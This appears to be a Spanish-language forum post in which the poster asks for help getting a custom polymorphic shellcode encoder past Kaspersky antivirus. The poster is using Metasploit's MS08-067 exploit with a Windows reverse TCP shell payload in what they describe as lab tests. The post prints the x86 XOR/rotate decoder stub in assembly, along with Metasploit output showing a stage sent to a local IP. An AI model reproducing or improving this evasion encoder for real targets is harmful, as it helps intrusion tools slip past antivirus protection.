Bueno lo primero, si el tema no esta en su lugar correcto lo siento, creo que esta mejor aqui porque creo que es un problema de polimorfismo.
Bien estoy practicando los polimorfismo con las shellcodes, estoy haciendo las pruebas en un windows y con metasploit, windows tiene como sistema de seguridad "IDS" Kaspersky internet Security 14, y estoy explotando el tipico 08_067_netapi, bien tengo el siguiente encode.
Código
_start: xorl %ebx, %ebx movw $0x13a, %bx jmp _C.0 _C.1: popl %edx _C.2: xorb $0xff, (%edx, %ebx) rolb (%edx) decw %bx jnz _C.2 jmp *%edx _C.0: call _C.1
Si, se puede mejorar sobre todo lo de bx, pero solo me preocupa la deteccion, entro en los sources de metasploit y modifico el payload windows/shell/reverse_tcp con el encode y los valores de Offsets.
Bien cuando tengo el AV desactivado todo bien, pero cuanto esta activado salta, esta es la deteccion.
Código:
PDM: Exploit.Win32.Generic
Apllication path: c:\windows\system32\svchost.exe
Hay por la red shellcodes anti-ids con polimorfismos mas simples, y la mia salta.
Pero cuando lanzo el ataque con metasploit marca lo siguientet, aplical su encode cosa que no le dije:
Código:
[*] Encoded stage with x86/shikata_ga_n
[*]Sending encoded stage (267 bytes) to 192.168.1.129
Que es problema de metasploit o de mi encode?
Un saludo.
P.D: No quiero hacer nada por hay, simplemente son pruebas, igualmente no me gusta mucho metasploit hace todo el trabajo.